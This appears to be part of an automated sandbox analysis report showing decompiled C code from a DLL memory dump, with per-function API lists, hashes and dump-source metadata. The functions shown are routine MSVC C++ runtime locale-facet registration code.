																					__eflags = E6E1DC295(_t203, _t241, _t264, _t271, _t278) - 0xffffffff;
																					if(__eflags == 0) {
																						_t245 = _t286 - 0x20;
																						E6E1A1438(_t245);
																						E6E1E3D74(_t286 - 0x20, 0x6e283504);
																						asm("int3");
																						E6E1E00AC(0x6e22851f, _t203, _t271, _t278, 4);
																						_t279 = _t245;
																						 *(_t286 - 0x10) = _t279;
																						 *((intOrPtr*)(_t279 + 4)) =  *((intOrPtr*)(_t286 + 0xc));
																						_push( *((intOrPtr*)(_t286 + 0x14)));
																						_t91 = _t286 - 4;
																						 *_t91 =  *(_t286 - 4) & 0x00000000;
																						__eflags =  *_t91;
																						 *_t279 = 0x6e22c414;
																						 *((char*)(_t279 + 0x28)) =  *((intOrPtr*)(_t286 + 0x10));
																						E6E1DD028(_t203, _t245, _t264, _t271, _t279,  *_t91);
																						return E6E1E0075(_t279,  *((intOrPtr*)(_t286 + 8)));
																					} else {
																						_t271 =  *(_t286 - 0x10);
																						 *(_t286 - 0x10) = _t271;
																						 *(_t286 - 4) = 1;
																						E6E1C6FD3(__eflags, _t271);
																						 *0x6e22a26c();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t271 + 4))))();
																						 *0x6e286e44 = _t271;
																						goto L40;
																					}
																				} else {
																					_t271 = _t278;
																					goto L40;
																				}
																			}
																		} else {
																			_t270 =  *(_t286 - 0x10);
																			 *(_t286 - 0x10) = _t270;
																			 *(_t286 - 4) = 1;
																			E6E1C6FD3(__eflags, _t270);
																			 *0x6e22a26c();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t270 + 4))))();
																			 *0x6e286e40 = _t270;
																			goto L33;
																		}
																	} else {
																		_t270 = _t277;
																		goto L33;
																	}
																}
															} else {
																_t269 =  *(_t286 - 0x10);
																 *(_t286 - 0x10) = _t269;
																 *(_t286 - 4) = 1;
																E6E1C6FD3(__eflags, _t269);
																 *0x6e22a26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t269 + 4))))();
																 *0x6e286e38 = _t269;
																goto L26;
															}
														} else {
															_t269 = _t276;
															goto L26;
														}
													}
												} else {
													_t268 =  *(_t286 - 0x10);
													 *(_t286 - 0x10) = _t268;
													 *(_t286 - 4) = 1;
													E6E1C6FD3(__eflags, _t268);
													 *0x6e22a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t268 + 4))))();
													 *0x6e286e3c = _t268;
													goto L19;
												}
											} else {
												_t268 = _t275;
												goto L19;
											}
										}
									} else {
										_t267 =  *(_t286 - 0x10);
										 *(_t286 - 0x10) = _t267;
										 *(_t286 - 4) = 1;
										E6E1C6FD3(__eflags, _t267);
										 *0x6e22a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t267 + 4))))();
										 *0x6e286e34 = _t267;
										goto L12;
									}
								} else {
									_t267 = _t274;
									goto L12;
								}
							}
						} else {
							_t266 =  *(_t286 - 0x10);
							 *(_t286 - 0x10) = _t266;
							 *(_t286 - 4) = 1;
							E6E1C6FD3(__eflags, _t266);
							 *0x6e22a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t266 + 4))))();
							 *0x6e286e30 = _t266;
							goto L5;
						}
					} else {
						_t266 = _t273;
						goto L5;
					}
				}
			}

APIs

__EH_prolog3.LIBCMT ref: 6E1DB89F
std::_Lockit::_Lockit.LIBCPMT ref: 6E1DB8A9
int.LIBCPMT ref: 6E1DB8C0

Part of subcall function 6E1A161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1A162D
Part of subcall function 6E1A161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1A1647

std::_Facet_Register.LIBCPMT ref: 6E1DB8FA
std::_Lockit::~_Lockit.LIBCPMT ref: 6E1DB91A
__CxxThrowException@8.LIBVCRUNTIME ref: 6E1DB938

Memory Dump Source

Source File: 00000016.00000002.570061995.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000016.00000002.569060574.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000016.00000002.596415964.000000006E22A000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID:
API String ID: 651022567-0
Opcode ID: e799f6be0897551da52b04bff28ae6679ed2d71f65ff5e63b5f4cec8c85cd289
Instruction ID: c9f1e3159f9ec4fb34ac39465f89b69ca6839ad7977a225371c66b486d63b50d
Opcode Fuzzy Hash: e799f6be0897551da52b04bff28ae6679ed2d71f65ff5e63b5f4cec8c85cd289
Instruction Fuzzy Hash: E91123B59105198BCF05DBE4C844EFEB37AAF64714F140908E411AB290CF789E88E791

Uniqueness

Uniqueness Score: -1.00%

Function 6E1DB93E, Relevance: 9.1, APIs: 6, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E6E1DB93E(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t83;
				signed int _t84;
				void* _t96;
				void* _t109;
				void* _t122;
				void* _t135;
				signed int _t207;
				signed int _t226;
				signed int _t227;
				signed int _t228;
				signed int _t229;
				signed int _t231;
				signed int _t232;
				signed int _t233;
				signed int _t234;
				signed int _t235;
				signed int _t236;
				void* _t242;

				_t223 = __edx;
				_t172 = __ebx;
				E6E1E00AC(0x6e2283cf, __ebx, __edi, __esi, 0x14);
				E6E1C6653(_t242 - 0x14, 0);
				_t231 =  *0x6e286e34;
				 *(_t242 - 4) =  *(_t242 - 4) & 0x00000000;
				 *(_t242 - 0x10) = _t231;
				_t83 = E6E1A161C(0x6e286e14);
				_t175 =  *((intOrPtr*)(_t242 + 8));
				_t84 = E6E1A171B( *((intOrPtr*)(_t242 + 8)), _t83);
				_t225 = _t84;
				if(_t84 != 0) {
					L5:
					E6E1C66BA(_t242 - 0x14);
					return E6E1E0075(_t225);
				} else {
					if(_t231 == 0) {
						_push( *((intOrPtr*)(_t242 + 8)));
						_push(_t242 - 0x10);
						__eflags = E6E1DC0B8(__ebx, _t175, __edx, _t225, _t231) - 0xffffffff;
						if(__eflags == 0) {
							E6E1A1438(_t242 - 0x20);
							E6E1E3D74(_t242 - 0x20, 0x6e283504);
							asm("int3");
							E6E1E00AC(0x6e2283cf, __ebx, _t225, _t231, 0x14);
							E6E1C6653(_t242 - 0x14, 0);
							_t232 =  *0x6e286e3c;
							 *(_t242 - 4) =  *(_t242 - 4) & 0x00000000;
							 *(_t242 - 0x10) = _t232;
							_t96 = E6E1A161C(0x6e286e1c);
							_t182 =  *((intOrPtr*)(_t242 + 8));
							_t226 = E6E1A171B( *((intOrPtr*)(_t242 + 8)), _t96);
							__eflags = _t226;
							if(_t226 != 0) {
								L12:
								E6E1C66BA(_t242 - 0x14);
								return E6E1E0075(_t226);
							} else {
								__eflags = _t232;
								if(_t232 == 0) {
									_push( *((intOrPtr*)(_t242 + 8)));
									_push(_t242 - 0x10);
									__eflags = E6E1DC120(_t172, _t182, __edx, _t226, _t232) - 0xffffffff;
									if(__eflags == 0) {
										E6E1A1438(_t242 - 0x20);
										E6E1E3D74(_t242 - 0x20, 0x6e283504);
										asm("int3");
										E6E1E00AC(0x6e2283cf, _t172, _t226, _t232, 0x14);
										E6E1C6653(_t242 - 0x14, 0);
										_t233 =  *0x6e286e38;
										 *(_t242 - 4) =  *(_t242 - 4) & 0x00000000;
										 *(_t242 - 0x10) = _t233;
										_t109 = E6E1A161C(0x6e286e18);
										_t189 =  *((intOrPtr*)(_t242 + 8));
										_t227 = E6E1A171B( *((intOrPtr*)(_t242 + 8)), _t109);
										__eflags = _t227;
										if(_t227 != 0) {
											L19:
											E6E1C66BA(_t242 - 0x14);
											return E6E1E0075(_t227);
										} else {
											__eflags = _t233;
											if(_t233 == 0) {
												_push( *((intOrPtr*)(_t242 + 8)));
												_push(_t242 - 0x10);
												__eflags = E6E1DC1A4(_t172, _t189, __edx, _t227, _t233) - 0xffffffff;
												if(__eflags == 0) {
													E6E1A1438(_t242 - 0x20);
													E6E1E3D74(_t242 - 0x20, 0x6e283504);
													asm("int3");
													E6E1E00AC(0x6e2283cf, _t172, _t227, _t233, 0x14);
													E6E1C6653(_t242 - 0x14, 0);
													_t234 =  *0x6e286e40;
													 *(_t242 - 4) =  *(_t242 - 4) & 0x00000000;
													 *(_t242 - 0x10) = _t234;
													_t122 = E6E1A161C(0x6e286e20);
													_t196 =  *((intOrPtr*)(_t242 + 8));
													_t228 = E6E1A171B( *((intOrPtr*)(_t242 + 8)), _t122);
													__eflags = _t228;
													if(_t228 != 0) {
														L26:
														E6E1C66BA(_t242 - 0x14);
														return E6E1E0075(_t228);
													} else {
														__eflags = _t234;
														if(_t234 == 0) {
															_push( *((intOrPtr*)(_t242 + 8)));
															_push(_t242 - 0x10);
															__eflags = E6E1DC229(_t172, _t196, _t223, _t228, _t234) - 0xffffffff;
															if(__eflags == 0) {
																E6E1A1438(_t242 - 0x20);
																E6E1E3D74(_t242 - 0x20, 0x6e283504);
																asm("int3");
																E6E1E00AC(0x6e2283cf, _t172, _t228, _t234, 0x14);
																E6E1C6653(_t242 - 0x14, 0);
																_t235 =  *0x6e286e44;
																 *(_t242 - 4) =  *(_t242 - 4) & 0x00000000;
																 *(_t242 - 0x10) = _t235;
																_t135 = E6E1A161C(0x6e286e24);
																_t203 =  *((intOrPtr*)(_t242 + 8));
																_t229 = E6E1A171B( *((intOrPtr*)(_t242 + 8)), _t135);
																__eflags = _t229;
																if(_t229 != 0) {
																	L33:
																	E6E1C66BA(_t242 - 0x14);
																	return E6E1E0075(_t229);
																} else {
																	__eflags = _t235;
																	if(_t235 == 0) {
																		_push( *((intOrPtr*)(_t242 + 8)));
																		_push(_t242 - 0x10);
																		__eflags = E6E1DC295(_t172, _t203, _t223, _t229, _t235) - 0xffffffff;
																		if(__eflags == 0) {
																			_t207 = _t242 - 0x20;
																			E6E1A1438(_t207);
																			E6E1E3D74(_t242 - 0x20, 0x6e283504);
																			asm("int3");
																			E6E1E00AC(0x6e22851f, _t172, _t229, _t235, 4);
																			_t236 = _t207;
																			 *(_t242 - 0x10) = _t236;
																			 *((intOrPtr*)(_t236 + 4)) =  *((intOrPtr*)(_t242 + 0xc));
																			_push( *((intOrPtr*)(_t242 + 0x14)));
																			_t77 = _t242 - 4;
																			 *_t77 =  *(_t242 - 4) & 0x00000000;
																			__eflags =  *_t77;
																			 *_t236 = 0x6e22c414;
																			 *((char*)(_t236 + 0x28)) =  *((intOrPtr*)(_t242 + 0x10));
																			E6E1DD028(_t172, _t207, _t223, _t229, _t236,  *_t77);
																			return E6E1E0075(_t236,  *((intOrPtr*)(_t242 + 8)));
																		} else {
																			_t229 =  *(_t242 - 0x10);
																			 *(_t242 - 0x10) = _t229;
																			 *(_t242 - 4) = 1;
																			E6E1C6FD3(__eflags, _t229);
																			 *0x6e22a26c();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t229 + 4))))();
																			 *0x6e286e44 = _t229;
																			goto L33;
																		}
																	} else {
																		_t229 = _t235;
																		goto L33;
																	}
																}
															} else {
																_t228 =  *(_t242 - 0x10);
																 *(_t242 - 0x10) = _t228;
																 *(_t242 - 4) = 1;
																E6E1C6FD3(__eflags, _t228);
																 *0x6e22a26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t228 + 4))))();
																 *0x6e286e40 = _t228;
																goto L26;
															}
														} else {
															_t228 = _t234;
															goto L26;
														}
													}
												} else {
													_t227 =  *(_t242 - 0x10);
													 *(_t242 - 0x10) = _t227;
													 *(_t242 - 4) = 1;
													E6E1C6FD3(__eflags, _t227);
													 *0x6e22a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t227 + 4))))();
													 *0x6e286e38 = _t227;
													goto L19;
												}
											} else {
												_t227 = _t233;
												goto L19;
											}
										}
									} else {
										_t226 =  *(_t242 - 0x10);
										 *(_t242 - 0x10) = _t226;
										 *(_t242 - 4) = 1;
										E6E1C6FD3(__eflags, _t226);
										 *0x6e22a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t226 + 4))))();
										 *0x6e286e3c = _t226;
										goto L12;
									}
								} else {
									_t226 = _t232;
									goto L12;
								}
							}
						} else {
							_t225 =  *(_t242 - 0x10);
							 *(_t242 - 0x10) = _t225;
							 *(_t242 - 4) = 1;
							E6E1C6FD3(__eflags, _t225);
							 *0x6e22a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t225 + 4))))();
							 *0x6e286e34 = _t225;
							goto L5;
						}
					} else {
						_t225 = _t231;
						goto L5;
					}
				}
			}

APIs

__EH_prolog3.LIBCMT ref: 6E1DB945
std::_Lockit::_Lockit.LIBCPMT ref: 6E1DB94F
int.LIBCPMT ref: 6E1DB966

Part of subcall function 6E1A161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1A162D
Part of subcall function 6E1A161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1A1647

std::_Facet_Register.LIBCPMT ref: 6E1DB9A0
std::_Lockit::~_Lockit.LIBCPMT ref: 6E1DB9C0
__CxxThrowException@8.LIBVCRUNTIME ref: 6E1DB9DE

Memory Dump Source

Source File: 00000016.00000002.570061995.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000016.00000002.569060574.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000016.00000002.596415964.000000006E22A000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID:
API String ID: 651022567-0
Opcode ID: 57537d90693026a42e34e5737df6084f7d9cf7a494fe5f08d931c3a36dbed659
Instruction ID: 0cf8869c9e7fe2bc64747d7e50309e8ab0ccf560e225cbacfe6cf7b543cb4068
Opcode Fuzzy Hash: 57537d90693026a42e34e5737df6084f7d9cf7a494fe5f08d931c3a36dbed659
Instruction Fuzzy Hash: A31159B591051CCBCF05EBE4C894EFEB37AAF54704F140908E521AB290CF749D88E791

Uniqueness

Uniqueness Score: -1.00%

Function 6E1CF94B, Relevance: 9.1, APIs: 6, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E6E1CF94B(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t97;
				signed int _t98;
				void* _t110;
				void* _t123;
				void* _t136;
				void* _t149;
				void* _t162;
				signed int _t245;
				signed int _t267;
				signed int _t268;
				signed int _t269;
				signed int _t270;
				signed int _t271;
				signed int _t273;
				signed int _t274;
				signed int _t275;
				signed int _t276;
				signed int _t277;
				signed int _t278;
				signed int _t279;
				void* _t286;

				_t264 = __edx;
				_t203 = __ebx;
				E6E1E00AC(0x6e2283cf, __ebx, __edi, __esi, 0x14);
				E6E1C6653(_t286 - 0x14, 0);
				_t273 =  *0x6e286ddc;
				 *(_t286 - 4) =  *(_t286 - 4) & 0x00000000;
				 *(_t286 - 0x10) = _t273;
				_t97 = E6E1A161C(0x6e286d88);
				_t206 =  *((intOrPtr*)(_t286 + 8));
				_t98 = E6E1A171B( *((intOrPtr*)(_t286 + 8)), _t97);
				_t266 = _t98;
				if(_t98 != 0) {
					L5:
					E6E1C66BA(_t286 - 0x14);
					return E6E1E0075(_t266);
				} else {
					if(_t273 == 0) {
						_push( *((intOrPtr*)(_t286 + 8)));
						_push(_t286 - 0x10);
						__eflags = E6E1D1409(__ebx, _t206, __edx, _t266, _t273) - 0xffffffff;
						if(__eflags == 0) {
							E6E1A1438(_t286 - 0x20);
							E6E1E3D74(_t286 - 0x20, 0x6e283504);
							asm("int3");
							E6E1E00AC(0x6e2283cf, __ebx, _t266, _t273, 0x14);
							E6E1C6653(_t286 - 0x14, 0);
							_t274 =  *0x6e286de0;
							 *(_t286 - 4) =  *(_t286 - 4) & 0x00000000;
							 *(_t286 - 0x10) = _t274;
							_t110 = E6E1A161C(0x6e286d8c);
							_t213 =  *((intOrPtr*)(_t286 + 8));
							_t267 = E6E1A171B( *((intOrPtr*)(_t286 + 8)), _t110);
							__eflags = _t267;
							if(_t267 != 0) {
								L12:
								E6E1C66BA(_t286 - 0x14);
								return E6E1E0075(_t267);
							} else {
								__eflags = _t274;
								if(_t274 == 0) {
									_push( *((intOrPtr*)(_t286 + 8)));
									_push(_t286 - 0x10);
									__eflags = E6E1D1471(_t203, _t213, __edx, _t267, _t274) - 0xffffffff;
									if(__eflags == 0) {
										E6E1A1438(_t286 - 0x20);
										E6E1E3D74(_t286 - 0x20, 0x6e283504);
										asm("int3");
										E6E1E00AC(0x6e2283cf, _t203, _t267, _t274, 0x14);
										E6E1C6653(_t286 - 0x14, 0);
										_t275 =  *0x6e286dfc;
										 *(_t286 - 4) =  *(_t286 - 4) & 0x00000000;
										 *(_t286 - 0x10) = _t275;
										_t123 = E6E1A161C(0x6e286da8);
										_t220 =  *((intOrPtr*)(_t286 + 8));
										_t268 = E6E1A171B( *((intOrPtr*)(_t286 + 8)), _t123);
										__eflags = _t268;
										if(_t268 != 0) {
											L19:
											E6E1C66BA(_t286 - 0x14);
											return E6E1E0075(_t268);
										} else {
											__eflags = _t275;
											if(_t275 == 0) {
												_push( *((intOrPtr*)(_t286 + 8)));
												_push(_t286 - 0x10);
												__eflags = E6E1D14EC(_t203, _t220, __edx, _t268, _t275) - 0xffffffff;
												if(__eflags == 0) {
													E6E1A1438(_t286 - 0x20);
													E6E1E3D74(_t286 - 0x20, 0x6e283504);
													asm("int3");
													E6E1E00AC(0x6e2283cf, _t203, _t268, _t275, 0x14);
													E6E1C6653(_t286 - 0x14, 0);
													_t276 =  *0x6e286dcc;
													 *(_t286 - 4) =  *(_t286 - 4) & 0x00000000;
													 *(_t286 - 0x10) = _t276;
													_t136 = E6E1A161C(0x6e286d80);
													_t227 =  *((intOrPtr*)(_t286 + 8));
													_t269 = E6E1A171B( *((intOrPtr*)(_t286 + 8)), _t136);
													__eflags = _t269;
													if(_t269 != 0) {
														L26:
														E6E1C66BA(_t286 - 0x14);
														return E6E1E0075(_t269);
													} else {
														__eflags = _t276;
														if(_t276 == 0) {
															_push( *((intOrPtr*)(_t286 + 8)));
															_push(_t286 - 0x10);
															__eflags = E6E1D1558(_t203, _t227, _t264, _t269, _t276) - 0xffffffff;
															if(__eflags == 0) {
																E6E1A1438(_t286 - 0x20);
																E6E1E3D74(_t286 - 0x20, 0x6e283504);
																asm("int3");
																E6E1E00AC(0x6e2283cf, _t203, _t269, _t276, 0x14);
																E6E1C6653(_t286 - 0x14, 0);
																_t277 =  *0x6e286e00;
																 *(_t286 - 4) =  *(_t286 - 4) & 0x00000000;
																 *(_t286 - 0x10) = _t277;
																_t149 = E6E1A161C(0x6e286dac);
																_t234 =  *((intOrPtr*)(_t286 + 8));
																_t270 = E6E1A171B( *((intOrPtr*)(_t286 + 8)), _t149);
																__eflags = _t270;
																if(_t270 != 0) {
																	L33:
																	E6E1C66BA(_t286 - 0x14);
																	return E6E1E0075(_t270);
																} else {
																	__eflags = _t277;
																	if(_t277 == 0) {
																		_push( *((intOrPtr*)(_t286 + 8)));
																		_push(_t286 - 0x10);
																		__eflags = E6E1D15C4(_t203, _t234, _t264, _t270, _t277) - 0xffffffff;
																		if(__eflags == 0) {
																			E6E1A1438(_t286 - 0x20);
																			E6E1E3D74(_t286 - 0x20, 0x6e283504);
																			asm("int3");
																			E6E1E00AC(0x6e2283cf, _t203, _t270, _t277, 0x14);
																			E6E1C6653(_t286 - 0x14, 0);
																			_t278 =  *0x6e286dd0;
																			 *(_t286 - 4) =  *(_t286 - 4) & 0x00000000;
																			 *(_t286 - 0x10) = _t278;
																			_t162 = E6E1A161C(0x6e286d60);
																			_t241 =  *((intOrPtr*)(_t286 + 8));
																			_t271 = E6E1A171B( *((intOrPtr*)(_t286 + 8)), _t162);
																			__eflags = _t271;
																			if(_t271 != 0) {
																				L40:
																				E6E1C66BA(_t286 - 0x14);
																				return E6E1E0075(_t271);
																			} else {
																				__eflags = _t278;
																				if(_t278 == 0) {
																					_push( *((intOrPtr*)(_t286 + 8)));
																					_push(_t286 - 0x10);
																					__eflags = E6E1D162A(_t203, _t241, _t264, _t271, _t278) - 0xffffffff;
																					if(__eflags == 0) {
																						_t245 = _t286 - 0x20;
																						E6E1A1438(_t245);
																						E6E1E3D74(_t286 - 0x20, 0x6e283504);
																						asm("int3");
																						E6E1E00AC(0x6e22851f, _t203, _t271, _t278, 4);
																						_t279 = _t245;
																						 *(_t286 - 0x10) = _t279;
																						 *((intOrPtr*)(_t279 + 4)) =  *((intOrPtr*)(_t286 + 0xc));
																						_push( *((intOrPtr*)(_t286 + 0x14)));
																						_t91 = _t286 - 4;
																						 *_t91 =  *(_t286 - 4) & 0x00000000;
																						__eflags =  *_t91;
																						 *_t279 = 0x6e22c0c4;
																						 *((char*)(_t279 + 0x28)) =  *((intOrPtr*)(_t286 + 0x10));
																						E6E1D542F(_t203, _t245, _t264, _t271, _t279,  *_t91);
																						return E6E1E0075(_t279,  *((intOrPtr*)(_t286 + 8)));
																					} else {
																						_t271 =  *(_t286 - 0x10);
																						 *(_t286 - 0x10) = _t271;
																						 *(_t286 - 4) = 1;
																						E6E1C6FD3(__eflags, _t271);
																						 *0x6e22a26c();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t271 + 4))))();
																						 *0x6e286dd0 = _t271;
																						goto L40;
																					}
																				} else {
																					_t271 = _t278;
																					goto L40;
																				}
																			}
																		} else {
																			_t270 =  *(_t286 - 0x10);
																			 *(_t286 - 0x10) = _t270;
																			 *(_t286 - 4) = 1;
																			E6E1C6FD3(__eflags, _t270);
																			 *0x6e22a26c();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t270 + 4))))();
																			 *0x6e286e00 = _t270;
																			goto L33;
																		}
																	} else {
																		_t270 = _t277;
																		goto L33;
																	}
																}
															} else {
																_t269 =  *(_t286 - 0x10);
																 *(_t286 - 0x10) = _t269;
																 *(_t286 - 4) = 1;
																E6E1C6FD3(__eflags, _t269);
																 *0x6e22a26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t269 + 4))))();
																 *0x6e286dcc = _t269;
																goto L26;
															}
														} else {
															_t269 = _t276;
															goto L26;
														}
													}
												} else {
													_t268 =  *(_t286 - 0x10);
													 *(_t286 - 0x10) = _t268;
													 *(_t286 - 4) = 1;
													E6E1C6FD3(__eflags, _t268);
													 *0x6e22a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t268 + 4))))();
													 *0x6e286dfc = _t268;
													goto L19;
												}
											} else {
												_t268 = _t275;
												goto L19;
											}
										}
									} else {
										_t267 =  *(_t286 - 0x10);
										 *(_t286 - 0x10) = _t267;
										 *(_t286 - 4) = 1;
										E6E1C6FD3(__eflags, _t267);
										 *0x6e22a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t267 + 4))))();
										 *0x6e286de0 = _t267;
										goto L12;
									}
								} else {
									_t267 = _t274;
									goto L12;
								}
							}
						} else {
							_t266 =  *(_t286 - 0x10);
							 *(_t286 - 0x10) = _t266;
							 *(_t286 - 4) = 1;
							E6E1C6FD3(__eflags, _t266);
							 *0x6e22a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t266 + 4))))();
							 *0x6e286ddc = _t266;
							goto L5;
						}
					} else {
						_t266 = _t273;
						goto L5;
					}
				}
			}

APIs

__EH_prolog3.LIBCMT ref: 6E1CF952
std::_Lockit::_Lockit.LIBCPMT ref: 6E1CF95C
int.LIBCPMT ref: 6E1CF973

Part of subcall function 6E1A161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1A162D
Part of subcall function 6E1A161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1A1647

std::_Facet_Register.LIBCPMT ref: 6E1CF9AD
std::_Lockit::~_Lockit.LIBCPMT ref: 6E1CF9CD
__CxxThrowException@8.LIBVCRUNTIME ref: 6E1CF9EB

Memory Dump Source

Source File: 00000016.00000002.570061995.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000016.00000002.569060574.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000016.00000002.596415964.000000006E22A000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID:
API String ID: 651022567-0
Opcode ID: 148cce06f4698f3c1b59b0b7607301927d8c1875eb8fb98b473bb6694b2dba32
Instruction ID: 19326a9d7719609cb019ca64b5657d603507dd1e5f02a9f181aa328bcb773ce6
Opcode Fuzzy Hash: 148cce06f4698f3c1b59b0b7607301927d8c1875eb8fb98b473bb6694b2dba32
Instruction Fuzzy Hash: B4117A759105289FCF01EBE4C864AFDF37AAF64B04F204809E021EB280CF789985E792

Uniqueness

Uniqueness Score: -1.00%

Function 6E1C4747, Relevance: 9.1, APIs: 6, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E6E1C4747(void* __ebx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t18;
				intOrPtr* _t19;
				intOrPtr* _t39;
				intOrPtr* _t44;
				void* _t47;

				E6E1E00AC(0x6e22816f, __ebx, __edi, __esi, 0x18);
				E6E1C6653(_t47 - 0x14, 0);
				 *(_t47 - 4) =  *(_t47 - 4) & 0x00000000;
				_t44 =  *0x6e29ce7c;
				 *((intOrPtr*)(_t47 - 0x10)) = _t44;
				_t18 = E6E1A161C(0x6e29ce90);
				_t35 =  *((intOrPtr*)(_t47 + 8));
				_t19 = E6E1A171B( *((intOrPtr*)(_t47 + 8)), _t18);
				_t46 = _t19;
				if(_t19 != 0) {
					L5:
					E6E1C66BA(_t47 - 0x14);
					return E6E1E0075(_t46);
				} else {
					if(_t44 == 0) {
						_push( *((intOrPtr*)(_t47 + 8)));
						_push(_t47 - 0x10);
						__eflags = E6E1C4F5F(__ebx, _t35, __edx, _t44, _t46) - 0xffffffff;
						if(__eflags == 0) {
							_t39 = _t47 - 0x20;
							E6E1A1438(_t39);
							E6E1E3D74(_t47 - 0x20, 0x6e283504);
							asm("int3");
							 *_t39 = __edx;
							return _t39;
						} else {
							_t46 =  *((intOrPtr*)(_t47 - 0x10));
							 *((intOrPtr*)(_t47 - 0x10)) = _t46;
							 *(_t47 - 4) = 1;
							E6E1C6FD3(__eflags, _t46);
							 *((intOrPtr*)( *_t46 + 4))();
							 *0x6e29ce7c = _t46;
							goto L5;
						}
					} else {
						_t46 = _t44;
						goto L5;
					}
				}
			}

APIs

__EH_prolog3.LIBCMT ref: 6E1C474E
std::_Lockit::_Lockit.LIBCPMT ref: 6E1C4758
int.LIBCPMT ref: 6E1C476F

Part of subcall function 6E1A161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1A162D
Part of subcall function 6E1A161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1A1647

std::_Facet_Register.LIBCPMT ref: 6E1C47A9
std::_Lockit::~_Lockit.LIBCPMT ref: 6E1C47BF
__CxxThrowException@8.LIBVCRUNTIME ref: 6E1C47DD

Memory Dump Source

Source File: 00000016.00000002.570061995.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000016.00000002.569060574.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000016.00000002.596415964.000000006E22A000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID:
API String ID: 651022567-0
Opcode ID: 0d7e3697b26dac51c7069c048225a11c5631339af5d59f6dbbca1dfb032c3f16
Instruction ID: c517de240fc0369a7a041250e9d3e7debac3dec11e6408834f476cdadaedf7c6
Opcode Fuzzy Hash: 0d7e3697b26dac51c7069c048225a11c5631339af5d59f6dbbca1dfb032c3f16
Instruction Fuzzy Hash: 311159759006288FCB01DBE4C804AFEB779BF25B04F20490CE521EB290DB788985E7D2

Uniqueness

Uniqueness Score: -1.00%

Function 6E1CF7FF, Relevance: 9.1, APIs: 6, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E6E1CF7FF(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t125;
				signed int _t126;
				void* _t138;
				void* _t151;
				void* _t164;
				void* _t177;
				void* _t190;
				void* _t203;
				void* _t216;
				signed int _t321;
				signed int _t349;
				signed int _t350;
				signed int _t351;
				signed int _t352;
				signed int _t353;
				signed int _t354;
				signed int _t355;
				signed int _t357;
				signed int _t358;
				signed int _t359;
				signed int _t360;
				signed int _t361;
				signed int _t362;
				signed int _t363;
				signed int _t364;
				signed int _t365;
				void* _t374;

				_t346 = __edx;
				_t265 = __ebx;
				E6E1E00AC(0x6e2283cf, __ebx, __edi, __esi, 0x14);
				E6E1C6653(_t374 - 0x14, 0);
				_t357 =  *0x6e286dd8;
				 *(_t374 - 4) =  *(_t374 - 4) & 0x00000000;
				 *(_t374 - 0x10) = _t357;
				_t125 = E6E1A161C(0x6e286d84);
				_t268 =  *((intOrPtr*)(_t374 + 8));
				_t126 = E6E1A171B( *((intOrPtr*)(_t374 + 8)), _t125);
				_t348 = _t126;
				if(_t126 != 0) {
					L5:
					E6E1C66BA(_t374 - 0x14);
					return E6E1E0075(_t348);
				} else {
					if(_t357 == 0) {
						_push( *((intOrPtr*)(_t374 + 8)));
						_push(_t374 - 0x10);
						__eflags = E6E1D1339(__ebx, _t268, __edx, _t348, _t357) - 0xffffffff;
						if(__eflags == 0) {
							E6E1A1438(_t374 - 0x20);
							E6E1E3D74(_t374 - 0x20, 0x6e283504);
							asm("int3");
							E6E1E00AC(0x6e2283cf, __ebx, _t348, _t357, 0x14);
							E6E1C6653(_t374 - 0x14, 0);
							_t358 =  *0x6e286db0;
							 *(_t374 - 4) =  *(_t374 - 4) & 0x00000000;
